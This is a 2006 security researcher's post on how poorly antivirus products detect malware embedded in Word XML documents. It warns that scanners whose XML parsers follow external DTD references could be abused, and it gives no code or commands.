Some Thoughts about Office Open XML and Malware Detection
Hi
Last week I have been googling around for comments and reactions from my
report "Malware Detection Rate in Alternative Word Formats"
(http://www.iplosion.com/archives/3) which was posted in the ISC diary on
August 23rd, 2006 (http://isc.sans.org/diary.php?storyid=1630). To sum it up
there has not been a lot of reactions in magazines or the like but it got at
least the attention of the malware research community.
There is this very interesting follow-up article from Christoph Alme in the
October 2006 edition of the Virus Bulletin. The two page article "Scanning
Embedded Objects in Word XML Files"
(http://www.securecomputing.com/pdf/CAlme_VBOct06.pdf) which elaborates how
AV products can identify embedded objects in Word XML files. He shows that
XML documents can be manipulated slightly, within the flexibility offered in
the XML standard, and still are considered valid Word documents. Using the
same VirusTotal-based testing method as I did, he demonstrates that all
existing AV products can be bypassed. As you might remember my initial paper
there were only three AV products capable of finding embedded malware in my
run-of-the-mill XML documents.
So what does this tell us: The most likely reason is that these three virus
scanners do not really understand XML document format. They most likely have
no XML parser integrated or the parser only implements the XML standard
partially. This once again melts down to the conclusion that the decoding
capability is the name of the game.
Now let us speculate that AV products will integrate a complete
off-the-shelf XML parser. Will this help? Well it will help to properly
decode XML documents but it will most likely introduce new vulnerabilities
in AV products so far unheard of. (Actually the motivation I am writing this
article is to prevent AV vendors to release such broken products). Let us
take XML external DTD references as an example. If the XML parsers are used
in default configuration or are not configured properly, scanning an XML
with an external reference will result in requests to external sites. That
is nice. This would allow an attacker to track malware distribution or
download additional exploit files to the scanning system.
With the release of Office 2007 a couple of days ago, which will have the
Office Open XML format as standard storage format, the urge for XML enabled
AV products will grow. My retesting today shows that the detection rate of
Netsky as an embedded object in a Office 2003 Word XML is still at the same
level as 3 months ago. I fear that the AV industry is not quite yet ready to
protect their customers against XML delivered attacks.
Kind regards
Jan P. Monsch